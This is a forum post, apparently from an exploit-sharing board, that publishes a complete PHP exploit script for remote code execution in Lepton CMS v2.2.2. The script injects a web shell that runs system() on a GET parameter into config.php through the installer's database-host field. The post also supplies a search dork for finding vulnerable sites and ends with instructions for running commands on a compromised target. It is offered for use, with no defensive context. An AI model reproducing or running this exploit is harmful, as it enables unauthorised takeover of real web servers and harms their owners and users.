Jump to content
Jako

[PHP] Lepton CMS v2.2.2 RCE

By Jako, in Exploituri

Recommended Posts

Jako Newbie

Jako

Posted
Posted 
<?php

/*
Lepton CMS v2.2.2 - Remote Code Execution
Dork: intext:"Design by CMS-LAB"
*/

$target = "http://127.0.0.1/lepton/install/save.php";
$payload = "');?><?php echo '<pre>'; system(\$_GET['cmd']); die();?>";

function curl_post($url, $post_data) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 15);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1");
        $output = curl_exec($ch);
        $info = curl_getinfo($ch);
        curl_close($ch);
        return $info;
}

$da = curl_post($target, "guid=E610A7F2-5E4A-4571-9391-C947152FDFB0&website_title=abc&lepton_url=a&default_timezone_string=Europe/London&default_language=EN&operating_system=linux&database_host=$payload&database_username=root&database_password=abc&database_name=test&table_prefix=abc_&admin_username=admin&admin_email=admin@admin.com&admin_password=admin&admin_repassword=admin");
if($da['http_code'] == 200) {
        echo "\nTada: Now visit /config.php?cmd= on target.\n";
}

?>

 

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...